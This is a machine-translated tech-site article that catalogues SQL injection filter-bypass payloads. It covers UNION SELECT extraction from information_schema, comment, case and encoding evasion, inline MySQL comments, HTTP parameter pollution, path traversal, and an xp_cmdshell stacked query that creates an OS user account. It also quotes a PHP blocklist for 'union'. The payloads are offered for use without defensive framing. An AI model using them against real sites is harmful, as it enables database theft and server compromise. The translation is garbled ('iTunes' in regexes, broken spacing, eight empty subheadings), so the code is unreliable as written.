What are the knowledge points bypassed by SQL injection 04/01 Update SLTechnology News&Howtos

What are the knowledge points bypassed by SQL injection

2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Shulou(Shulou.com)05/31 Report--

This article mainly introduces what are the knowledge points bypassed by SQL injection, which are introduced in great detail and have certain reference value. Friends who are interested must finish reading them.

First, bypass the waf idea

From the first step, analyze it bit by bit, and then bypass it.

1. Filter and,or

Preg_match ('/ (and | or) / iTunes, $id) Filtered injection: 1 or 1 = 11 and 1 = 1Bypassed injection: 1 | 1 = 11 & & 1 = 1

2. Filter and, or, union

Preg_match ('/ (and | or | union) / iTunes, $id) Filtered injection: union select user, password from usersBypassed injection: 1 | (select user from users where user_id = 1) = 'admin'

3. Filter and, or, union, where

4. Filter and, or, union, where, limit

5. Filter and, or, union, where, limit, group by

6. Filter and, or, union, where, limit, group by, select

7. Filter and, or, union, where, limit, group by, select,'

8. Filter and, or, union, where, limit, group by, select,', hex

9. Filter and, or, union, where, limit, group by, select,', hex, substr

10. Filter and, or, union, where, limit, group by, select,', hex, substr, spaces

Second, regular bypass

Bypass according to regular fuzzy matching characteristics, such as filtering'='.

Filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1, 1 or'1, 1 or char (97)

Eg:filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between'a' and 'z'Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char (97) and char (122) Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7aBypassed Injection: 1 union select 1 Table_name from information_schema.tables where table_name like 0x7573657273

III. General bypass

1. Comment character

? id=1+un//ion+se//lect+1,2,3-

two。 Upper and lowercase

? id=1+UnIoN//SeLecT//1,2,3-

3. Keyword substitution

Some waf and others have replaced the SQL keyword with preg_replace.

? id=1+UNunionION+SEselectLECT+1,2,3--?id=1+union+select+1,2,3--

Sometimes the comment character'/ * / 'may be filtered or bypassed

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).htmlBypassed: http://localhost/id/1||lpad(first_name,7,1).html

4. Coding

A classic script: Nukesentinel.php

/ / Check for UNION attack / / Copyright 2004 (c) Raven PHP Scripts $blocker_row = $blocker_array [1] If ($blocker_row ['activate'] > 0) {if (stristr ($nsnst_const [' query_string'],'+ union+') OR\ stristr ($nsnst_const ['query_string'],'% 20union% 20') OR\ stristr ($nsnst_const ['query_string'],' * / union/*') OR\ stristr ($nsnst_const ['query_string'],' union') OR\ stristr ($nsnst_const ['query_string_base64']) '+ union+') OR\ stristr ($nsnst_const [' query_string_base64'],'% 20Union% 20') OR\ stristr ($nsnst_const ['query_string_base64'],' * / union/*') OR\ stristr ($nsnst_const ['query_string_base64'],' union')) {/ / block_ip ($blocker_row) Die ("BLOCK IP 1");}} Forbidden: http://localhost/php/?/**/union/**/selectBypassed: http://localhost/php/?/%2A%2A/union/%2A%2A/selectBypassed: http://localhost/php/?%2f**%2funion%2f**%2fselect

5. Buffer overflow

Http://localhost/news.php?id=1+and+(select 1) = (select 0xA*1000) + union+select+1,2,version (), database (), user (), 6, 7, 8, 9, 10-

6. Inline comments (mysql)

Http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

IV. Advanced bypass

1.HPP (http parameter pollution)

For example:

Eg:

In the environment of ASP/ASP.NET

Forbidden: http://localhost/search.aspx?q=select name,password from usersBypassed: http://localhost/search.aspx?q=select name&q=password from usersBypassed: http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/usersBypassed: http://localhost/news.aspx?id=1'; / * & id=1*/ EXEC / * & id=1*/ master..xp_cmdshell / * & id=1*/ net user test test / * & id=1*/--

2.HPC (http parameter pollution)

RFC2396 defines the following characters:

Unreserved: a murz, Amurz, 0-9 and. ! ~ *'() Reserved:; /?: @ & = + $, Unwise: {} |\ ^ [] `

Different Web servers have different logic when processing specially constructed requests:

Eg:

Forbidden: http://localhost/?xp_cmdshellBypassed: http://localhost/?xp[cmdshellForbidden: http://localhost/test.asp?file=../flag.txtBypassed: http://localhost/test.asp?file=.%./flag.txtForbidden: http://localhost/news.asp?id=10 and 1 0 / (select top 1 table_name from information_schema.tables) Bypassed: http://localhost/news.asp?id=10 a%nd 1 0 / (se%lect top 1 ta%ble_name fr% Om info%rmation_schema.tables) these are all the contents of the article "what are the knowledge points bypassed by SQL injection?" Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.